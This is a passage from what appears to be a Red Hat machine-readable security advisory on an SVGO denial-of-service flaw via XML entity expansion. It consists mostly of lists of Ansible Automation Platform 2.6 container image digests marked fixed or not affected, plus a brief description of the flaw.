"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445132"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application\u0027s failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "svgo: SVGO: Denial of Service via XML entity expansion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
